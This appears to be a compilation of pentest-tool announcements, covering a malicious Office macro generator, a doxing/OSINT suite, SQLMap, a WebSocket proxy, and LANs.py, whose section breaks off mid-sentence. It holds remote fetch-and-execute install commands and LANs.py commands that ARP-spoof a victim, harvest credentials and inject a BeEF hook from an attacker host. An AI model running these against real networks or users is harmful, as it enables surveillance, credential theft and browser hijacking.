Luckystrike – A PowerShell based utility for the creation of malicious Office macro documents

A PowerShell based utility for the creation of malicious Office macro documents. To be used for pentesting or educational purposes only.

Luckystrike is a menu-driven (SET style) PowerShell-based generator of malicious .xls and .doc documents. All your payloads are saved into a database for easy retrieval and embedding into a new or existing document. Luckystrike provides several infection methods designed to get your payloads to execute without tripping AV. See the "Installation" section below for instructions on getting started.

Initial Blog Post & Demonstration: https://www.shellntel.com/blog/2016/9/13/luckystrike-a-database-backed-evil-macro-generator
DerbyCon 6.0 Tool Drop Talk: https://www.youtube.com/watch?v=1Yzg1xps2kE

Installation

Requirements:
- Windows 7/10 (preferably x64)
- PowerShell v5+
- Microsoft Office 2010+ installed

To install, execute the following command from an administrative PowerShell prompt (required to install the PSSQLite module). A luckystrike directory will be created automatically.

iex (new-object net.webclient).downloadstring('https://git.io/v7kbp')

To run, simply cd to the luckystrike directory, then:

.\luckystrike.ps1

Upgrading

Luckystrike will check for updates upon opening. You will be prompted to update. Any templates and payloads you have in the database are preserved.

Download Luckystrike

Link: http://feedproxy.google.com/~r/PentestTools/~3/it_yxPS7usE/luckystrike-powershell-based-utility.html

D0xk1t – Web-based OSINT and Active Reconnaissance Suite

Active reconnaissance, information gathering and OSINT built in a portable web application.

1.0 Introduction

What is this?
D0xk1t is an open-source, self-hosted and easy to use OSINT and active reconnaissance web application for penetration testers. Based off of the prior command-line script, D0xk1t is now fully capable of conducting reconnaissance and penetration testing for security researchers who need a framework without the head-scratching.

Is this a website / web-app?
Yes and no. In essence, it is not a typical website. D0xk1t is self-hosted. There is no server stack, cloud-based service, SaaS, etc. holding it up. You have the option of deploying D0xk1t on a local network or deploying your own instance on any infrastructure/technology you wish (although not recommended).

Is this free?
Yes. D0xk1t will forever be open-source. If you wish to contribute, you can make a fork, add any changes, and send a pull request on GitHub.

2.0 Features
- Easy-to-build, risk-free installation
- Simple Bootstrap Admin Dashboard
- Deployable to the Internet
- Serverless (at the moment)
- Expansive to any OS

3.0 Installation

Since D0xk1t is self-hosted, it does not work immediately out of the box. It is recommended that you use a virtualenv container due to the sheer number of dependencies that can run into conflict with your Python configuration.

3.1 Building

Lucky for you, there are two ways to build D0xk1t: the quick 'n easy way, and the manual way.

Quick 'n Easy Way:

$ curl https://raw.githubusercontent.com/ex0dus-0x/D0xk1t/master/extras/install | sudo /bin/bash

Manual Way:

$ git clone https://github.com/ex0dus-0x/D0xk1t && cd D0xk1t
$ # Start virtualenv if you wish
$ pip install -r requirements.txt
$ python run.py

3.2 Configuration

Open config.py. Here you will see all the environment variables that the application uses. Three important fields you MUST be aware of if you plan to deploy to the web:

GOOGLEMAPS_API_KEY = "YOUR_API_KEY_HERE"
SECRET_KEY = 'SECRET_KEY_HERE'

GOOGLEMAPS_API_KEY denotes the Google Maps API Key. This is essential for the GeoIP module. You can obtain it here and change the variable accordingly.

SECRET_KEY is the private key utilized by WTForm's CSRF protection feature. If deployed, change it to your liking.

3.3 Deployment

Once installed, run with python run.py. The application will run a first-time boot, and will then be accessible at 127.0.0.1:5000. Log in with credentials, and you will be presented with the admin panel.

Of course, this is self-hosting on localhost. Although work in progress, D0xk1t will soon support hosting on a variety of SaaS and server stacks of your choice.
- Heroku: TODO, build a Procfile, as well as bash scripts for automatic deployment
- ngrok: TODO, build a script for deployment to ngrok

4.0 Modules

D0x Module
The D0x module is a comprehensive info-gathering database that enables the pentester to write "D0x", a file that holds a collection of data on a certain target, or targets. Using this data, the tester will be able to effectively understand their target, which is a critical point in the attacker's kill chain. D0xing is usually deemed malicious and black-hat in nature. However, with the D0x module, we aim to help security researchers gain momentum when conducting in-the-field pentesting.

The D0x module comes with several features, improved upon based off of the prior revision:
- Secure database support, with delete and export (as .csv) options

GeoIP Module
When working with metadata, IP addresses often pop up as a point of interest. Using Maxmind and Google Maps APIs, the GeoIP module aims to collect geolocation information on public IP addresses, in order to gather data on physical location during the reconnaissance stage of the kill chain.
- Google Maps support for accurate GeoIP visualization
- API endpoint support for command-liners or developers.

Download D0xk1t

Link: http://feedproxy.google.com/~r/PentestTools/~3/6Ep1C3ljyVE/d0xk1t-web-based-osint-and-active.html

sdnpwn – An SDN Penetration Testing Toolkit

The Open Networking Foundation defines SDN as "The physical separation of the network control plane from the forwarding plane, and where a control plane controls several devices". What this means is that the decision making which would traditionally be performed by a router or a switch (i.e. forwarding decisions) is moved to a central device known as a controller. Routers and switches become generic forwarding devices (also known simply as 'switches'). These forwarding devices, or switches, communicate with the controller at the Southbound Interface (SBI) in order to receive instructions on how to forward network traffic. Applications may communicate with the controller at the Northbound Interface (NBI) to receive network statistics or influence traffic forwarding decisions.

sdnpwn is a toolkit and framework for testing the security of Software-Defined Networks (SDNs).

Installation

First download sdnpwn using git:

git clone https://github.com/smythtech/sdnpwn

Make the sdnpwn.py and setup.sh scripts executable:

sudo chmod +x sdnpwn.py
sudo chmod +x setup.sh

The setup.sh script takes care of installing the software required for sdnpwn to function. Just run ./setup.sh and follow the instructions.

sudo ./setup.sh

Usage

Functionality in sdnpwn is divided into different modules. Each attack or attack type is available from a certain module.

Modules can be executed like so:

./sdnpwn.py <module options>

The mods module can be used to list all available modules:

./sdnpwn.py mods

More information about a certain module can be accessed using the info module:

./sdnpwn.py info mods

The above command would retrieve more information about the mods module, such as a description and available options.

Further Information

Check out https://sdnpwn.net for articles and tutorials on using various sdnpwn modules and the attacks they use.

Download sdnpwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/tAmAPbAi_y0/sdnpwn-sdn-penetration-testing-toolkit.html

WSSiP – Application for capturing, modifying and sending custom WebSocket data from client to server and vice versa

Short for "WebSocket/Socket.io Proxy", this tool, written in Node.js, provides a user interface to capture, intercept, send custom messages and view all WebSocket and Socket.IO communications between the client and server.

Upstream proxy support also means you can forward HTTP/HTTPS traffic to an intercepting proxy of your choice (e.g. Burp Suite or Pappy Proxy) but view WebSocket traffic in WSSiP. More information can be found on the blog post.

There is an outward bridge via HTTP to write a fuzzer in any language you choose to debug and fuzz for security vulnerabilities.

Installation

From Packaged Application
See Releases.

From npm/yarn (for CLI commands)
Run the following in your command line:

npm:
# Install Electron globally
npm i -g electron@1.7
# Install wssip global for "wssip" command
npm i -g wssip
# Launch!
wssip

yarn: (Make sure the directory in yarn global bin is in your PATH)
yarn global add electron@1.7
yarn global add wssip
wssip

You can also run npm install electron (or yarn add electron) inside the installed WSSiP directory if you do not want to install Electron globally, as the app packager requires Electron be added to developer dependencies.

From Source
Using a command line:

# Clone repository locally
git clone https://github.com/nccgroup/wssip
# Change to the directory
cd wssip
# If you are developing for WSSiP:
# npm i
# If not... (as to minimize disk space):
npm i electron@1.7
npm i --production
# Start application:
npm start

Usage
1. Open the WSSiP application.
2. WSSiP will start listening automatically. This will default to localhost on port 8080.
3. Optionally, use Tools > Use Upstream Proxy to use another intercepting proxy to view web traffic.
4. Configure the browser to point to http://localhost:8080/ as the HTTP Proxy.
5. Navigate to a page using WebSockets. A good example is the WS Echo Demonstration.
6. ???
7. Potato.

Fuzzing

WSSiP provides an HTTP bridge via the man-in-the-middle proxy for custom applications to help fuzz a connection. These are accessed over the proxy server.

A few of the simple CA certificate downloads are:
- http://mitm/ca.pem / http://mitm/ca.der (Download CA Certificate)
- http://mitm/ca_pri.pem / http://mitm/ca_pri.der (Download Private Key)
- http://mitm/ca_pub.pem / http://mitm/ca_pub.der (Download Public Key)

Get WebSocket Connection Info
Returns whether the WebSocket id is connected to a web server, and if so, returns information.

URL: GET http://mitm/ws/:id
URL Params: id=[integer]
Success Response (Not Connected): Code: 200, Content: {connected: false}
Success Response (Connected): Code: 200, Content: {connected: true, url: 'ws://echo.websocket.org', bytesReceived: 0, extensions: {}, readyState: 3, protocol: '', protocolVersion: 13}

Send WebSocket Data
Send WebSocket data.

URL: POST http://mitm/ws/:id/:sender/:mode/:type?log=:log
URL Params:
Required:
- id=[integer]
- sender: one of client or server
- mode: one of message, ping or pong
- type: one of ascii or binary (text is an alias of ascii)
Optional:
- log: either true or y to log in the WSSiP application. Errors will be logged in the WSSiP application instead of being returned via the REST API.
Data Params: Raw data in the POST field will be sent to the WebSocket server.
Success Response: Code: 200, Content: {success: true}
Error Response: Code: 500, Content: {success: false, reason: 'Error message'}

Download WSSiP

Link: http://feedproxy.google.com/~r/PentestTools/~3/E20rnhGZbbU/wssip-application-for-capturing.html

How to run Android Apps on Mac

Even though most people now use mobile phones, desktops still have a considerable user base. Many people still prefer a large screen for most tasks. Most people who own a Mac prefer an iPhone, because macOS and iOS are deeply integrated to give you good features and easy sync. However, Android is […]
The post How to run Android Apps on Mac appeared first on UseThisTip.

Link: http://feedproxy.google.com/~r/blogspot/csAFg/~3/99W6gSU6rV0/how-to-run-android-apps-on-mac.html

Sobelow – Security-Focused Static Analysis for the Phoenix Framework

Sobelow is a security-focused static analysis tool for the Phoenix framework. For security researchers, it is a useful tool for getting a quick view of points of interest. For project maintainers, it can be used to prevent introducing a number of common vulnerabilities.

Currently Sobelow detects some types of the following security issues:
- Insecure configuration
- Known-vulnerable dependencies
- Cross-Site Scripting
- SQL injection
- Command injection
- Denial of Service
- Directory traversal
- Unsafe serialization

Potential vulnerabilities are flagged in different colors according to confidence in their insecurity. High confidence is red, medium confidence is yellow, and low confidence is green.

A finding is typically marked "low confidence" if it looks like a function could be used insecurely, but it cannot reliably be determined whether the function accepts user-supplied input. That is to say, green findings are not secure, they just require greater manual validation.

Note: This project is in constant development, and additional vulnerabilities will be flagged as time goes on. If you encounter a bug, or would like to request additional features or security checks, please open an issue!

Installation

To install Sobelow, you must have a working Elixir environment. Then, execute the following from the command line:

$ mix archive.install hex sobelow

You may also install directly from GitHub with the following command:

$ mix archive.install github nccgroup/sobelow

Use

The simplest way to scan a Phoenix project is to run the following from the project root:

$ mix sobelow

Options
--root, -r: Specify application root directory
--with-code, -v: Print vulnerable code snippets
--ignore, -i: Ignore modules
--ignore-files: Ignore files
--details, -d: Get module details
--all-details: Get all module details
--private: Skip update checks
--router: Specify router location
--exit: Return non-zero exit status
--format, -f: Specify findings output format
--quiet: Return no output if there are no findings
--compact: Minimal, single-line findings

The root option takes a path argument:

$ mix sobelow --root ../my_project

The with-code option takes no arguments:

$ mix sobelow --with-code

The ignore option takes a comma-separated list of modules:

$ mix sobelow -i XSS.Raw,Traversal

The ignore-files option takes a comma-separated list of file names. File names should be absolute paths, or relative to the application root.

$ mix sobelow --ignore-files config/prod.exs

The details option takes a single module:

$ mix sobelow -d Config.CSRF

The exit option accepts a confidence threshold (low, medium, or high), and will return a non-zero exit status at or above that threshold.

$ mix sobelow --exit Low

The format option accepts an output format for findings. Current formats include txt (the default) and json.

Note: The json format option does not support the --with-code flag. All findings are organized by confidence level, and contain a "type" key. However, other keys may vary between finding types.

$ mix sobelow --format json

Configuration Files

Sobelow allows users to save frequently used options in a configuration file. For example, if you find yourself constantly running:

$ mix sobelow -i XSS.Raw,Traversal --with-code --exit Low

You can use the --save-config flag to create your .sobelow-conf config file:

$ mix sobelow -i XSS.Raw,Traversal --with-code --exit Low --save-config

This command will create the .sobelow-conf file at the root of your application. You can edit this file directly to make changes.

Now if you want to run Sobelow with the saved configuration, you can run Sobelow with the --config flag.

$ mix sobelow --config

False Positives

Sobelow favors over-reporting versus under-reporting. As such, you may find a number of false positives in a typical scan. These findings may be individually ignored by adding a # sobelow_skip comment, along with a list of modules, before the function definition.

# sobelow_skip ["Traversal"]
def vuln_func(…) do
  …
end

Then, run the scan with the --skip flag.

$ mix sobelow --skip

Config and Vulnerable Dependency findings cannot be skipped in this way. For these, use the standard ignore option.

Modules

Finding categories are broken up into modules. These modules can then be used to either ignore classes of findings (via the ignore and skip options) or to get vulnerability details (via the details option).

This list, and other helpful information, can be found on the command line:

$ mix help sobelow

Updates

When scanning a project, Sobelow will occasionally check for updates, and will print an alert if a new version is available. Sobelow keeps track of the last update check by creating a .sobelow file in the root of the scanned project.

If this functionality is not desired, the --private flag can be used with the scan.

$ mix sobelow --private

Download Sobelow

Link: http://feedproxy.google.com/~r/PentestTools/~3/w1yDssiShnE/sobelow-security-focused-static.html

SQLMap v1.1.8 – Automatic SQL Injection And Database Takeover Tool

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features
- Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
- Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
- Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
- Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
- Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
- Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
- Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain strings like name and pass.
- Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
- Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

Installation

You can download the latest tarball by clicking here or the latest zipball by clicking here.

Preferably, you can download sqlmap by cloning the Git repository:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap works out of the box with Python version 2.6.x and 2.7.x on any platform.

Usage

To get a list of basic options and switches use:

python sqlmap.py -h

To get a list of all options and switches use:

python sqlmap.py -hh

You can find a sample run here. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the user's manual.

Links
- Homepage: http://sqlmap.org
- Download: .tar.gz or .zip
- Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
- Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
- User's manual: https://github.com/sqlmapproject/sqlmap/wiki
- Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
- Twitter: @sqlmap
- Demos: http://www.youtube.com/user/inquisb/videos
- Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

Translations: Bulgarian, Chinese, Croatian, French, Greek, Indonesian, Italian, Japanese, Portuguese, Spanish, Turkish

Download SQLMap v1.1.8

Link: http://feedproxy.google.com/~r/PentestTools/~3/GloCOjGOwrc/sqlmap-v118-automatic-sql-injection-and.html

LANs.py – Inject Code, Jam Wifi, And Spy on Wifi Users

LANs.py

Automatically find the most active WLAN users, then spy on one of them and/or inject arbitrary HTML/JS into pages they visit. Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays the most interesting bits of their traffic and can inject custom HTML into pages they visit. Cleans up after itself.

Can also be used to continuously jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. This can be fine-tuned to allow jamming of everyone or even just one client. Cannot jam WiFi and spy simultaneously.

Prerequisites: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optional), nmap, nbtscan, tcpdump, and a wireless card capable of promiscuous mode if you don't know the IP of your target.

Tested on Kali. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim.

All options:

python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC] [-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n] [-i INTERFACE] [-r REDIRECTTO] [-rip ROUTERIP] [-rmac ROUTERMAC] [-pcap PCAP] [-s SKIP] [-ch CHANNEL] [-m MAXIMUM] [-no] [-t TIMEINTERVAL] [--packets PACKETS] [--directedonly] [--accesspoint ACCESSPOINT]

Usage

Common usage:

python LANs.py -u -p

Active target identification which ARP spoofs the chosen target and outputs all the interesting non-HTTPS data they send or request. There's no -ip option, so this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network. Attempts to tag the targets with a Windows netbios name and prints how many data packets they are sending/receiving. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Ctrl-C when you're ready and pick your target, which it will then ARP spoof.

Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol usernames/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received.

Screenshot: Running LANs.py without arguments will give you the list of active targets and, upon selecting one, it will act as a simple ARP spoofer.

Another common usage:

python LANs.py -u -p -d -ip 192.168.0.10

-d: open an xterm with driftnet to see all images they view
-ip: target this IP address and skip the active targeting at the beginning

HTML injection:

python LANs.py -b http://192.168.0.5:3000/hook.js

Inject a BeEF hook URL (http://beefproject.com/, tutorial: http://resources.infosecinstitute.com/beef-part-1/) into pages the victim visits. This just wraps the argument in